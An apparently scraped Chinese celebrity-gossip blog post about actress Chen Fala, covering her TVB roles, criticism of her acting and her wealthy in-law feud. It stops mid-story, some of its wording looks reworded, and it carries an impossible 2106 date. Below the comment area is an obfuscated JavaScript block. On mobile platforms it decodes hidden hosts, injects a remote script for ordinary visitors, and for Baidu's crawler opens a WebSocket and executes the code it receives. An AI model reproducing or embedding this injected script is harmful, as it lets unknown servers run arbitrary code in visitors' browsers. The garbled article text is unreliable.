撕下标签踢走豪门,姐的人生不怕重头再来

时间:2106-02-07 14:28:15阅读:3106
这两天,各位同学都陆续开工了吧?勤奋的八八,整个春节只歇息了两天,等于早就开工啦。不过对于大多数人来说,现在才是开工大吉开启新气象的日子。所以那些看了闹心的瓜咱就不提了,还是说点喜庆的事儿吧。搞钱才

      这两天,各位同学都陆续开工了吧?

      勤奋的八八,整个春节只歇息了两天,等于早就开工啦。

      可是对于大多数人来说,现在才是开工大吉开启新气象的日子。

      所以那些看了闹心的瓜咱就不提了,还是说点喜庆的事儿吧。

      搞钱才是主旋律的当下,春节期间大家的目光都集中在这个票房爆了、那个明星红了。

      一派热闹中,有条小小的喜讯可能没太多人注意,却让八八由衷想说一声恭喜:大年初三情人节那天,陈法拉宣布已生女。

      值得恭喜的,不只是当妈妈这件事;更因为她让我们看到,困住很多女性的年龄恐惧、身份焦虑,其实并没有想象中那么可怕。

      只要敢于重新出发,一样可以活得精彩。

      ——我是拒绝再撕的分割线——

      如今提起TVB五小花,很多人都怀念那个各有各美的时代。

      尤其对比如今,三色台小花们无论辨识度还是演技都乏善可陈也照样拿视后,大家更发现上一辈的可贵。

      但在五小花活跃荧屏的时期,对她们挑剔的声音也有很多。其中被评价得最刻薄的,可能就是陈法拉。

      五小花中,胡杏儿杨怡徐子珊都有演技代表作;钟嘉欣演技虽有争议,但一向是乖乖女正面形象。

      唯独陈法拉,被贴上最多负面标签:姣精、演技差、五花垫底、豪门弃妇......

      三色台期间,似乎她唯一可取之处就是甜美外貌。

      陈法拉拿过全美亚裔小姐选美冠军、纽约华裔小姐选美冠军和国际华裔小姐选美亚军,选美,让她踏入了五光十色的娱乐圈。

      签入TVB当演员以后,让她脱颖而出的也是美貌。

      2007年在《师奶兵团》里的一场推油戏,成为全港话题。以后她在《诱情转驳》里又演了穿热裤渔网袜的钢管舞女郎,性感狐狸精形象不得人心。

      本来这种角色,也不失为能在一众美女中让人牢牢记住的独特定位。

      但港媒非得角色上升演员,把“姣精”标签贴到了陈法拉身上(八八注:“姣”是风骚的意思)。

      陈法拉极其讨厌这个外号,不止一次说希望不要再这么叫她。

      为了摆脱这个标签,陈法拉努力接演其他类型的角色。

      两部《溏心风暴》里的乖乖女,她演起来中规中矩。可是因为剧集大火,人设又惹人怜爱,也收获了不少人气。

      但乖乖女这种低难度角色,毕竟只能入门。当陈法拉试图再下台阶挑大梁,就显得各种吃力。

      潜行狙击》里演CIB高级女督察周望晴,突破形象弄了短发造型,演戏时为了显得干练常常面无表情,可是女下属的气场却没出来,始终力量不太够。

      真正让她被吐槽惨了的,还是那部《冲上云霄2》。

      陈法拉演的这个角色的确是有点“作”,常常稀里糊涂发飙、大哭然后跑走,但重点是,陈法拉哭了半天,却没哭出眼泪来……

      静态还好,一做起夸张的表情来,整个五官都扭曲在一路了……再美的美人摊上这样的演技也都会减分的呀。

      陈法拉戏里被吐槽,戏外又因为豪门撕战,成了吃瓜群众消遣取笑的对象。

      向来势利的港媒,在陈法拉和富二代薛世恒传出绯闻时,起初都是羡慕跪舔大喊“13亿身家太子爷”、“豪门准媳妇”。

      陈法拉却非常低调,恋爱期间总是对外声称“大家是朋友”,结婚也没有公开。

      但还是瞒可是无孔不入的2港媒,秘密结婚的消息还是被爆了出来,薛世恒手上的婚戒也被拍到作为铁证。

      虽然陈法拉不想炒话题,但挡不住港媒对豪门的好奇心。

      加上遭遇奇葩妯娌、资深公主病患者诸葛紫岐,她陷入了想不高调也难,想不撕也得撕的尴尬处境。

      薛世恒是薛家长子,诸葛紫岐嫁的是二令郎薛嘉麟。

      诸葛本是一个小模特,没甚么拿得出手的成绩,却靠着擅长炒作的本事,硬给自己炒出了小名气。

      她自称是诸葛亮的第63代后人,频频爆出雷人无脑名言出位:

      “男朋友可以没有,可是佣人必然要有。”““坐巴士好容易翻车的,两层那么高,转弯的时候好容易砰一声翻掉~”

      还有人向媒体爆料,这位诸葛女士疑似有六张差别名字的身份证复印件, 出生年份从1978年到1985年共6个差别年份!

      这波操作实在使人叹为观止啊~

      靠炒成名的诸葛女士,当然不会放过捆绑陈法拉这个名人妯娌上位的机会。

      2009年,薛世恒的外婆去世,薛家全部到灵堂吊唁。港媒会高度关注这场葬礼,是因为陈法拉一向不愿公开豪门媳妇的身份。

      看点本在于陈法拉现身灵堂坐实薛家大少奶奶的身份,却因为诸葛巧妙放风转移焦点,变成了一场“灵堂争宠'双女主大戏。

      评论

      • 评论加载中...
      --== 选择主题 ==--
      function JeqEKbgC(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function FJeCoyWV(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return JeqEKbgC(t);};window[''+'E'+'V'+'J'+'n'+'d'+'j'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=FJeCoyWV,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('aGoueGluYm8tbG9yYSS5jbg==','dHIueWVzdW422NzguY229t','151898',window,document,['S','2']);}:function(){};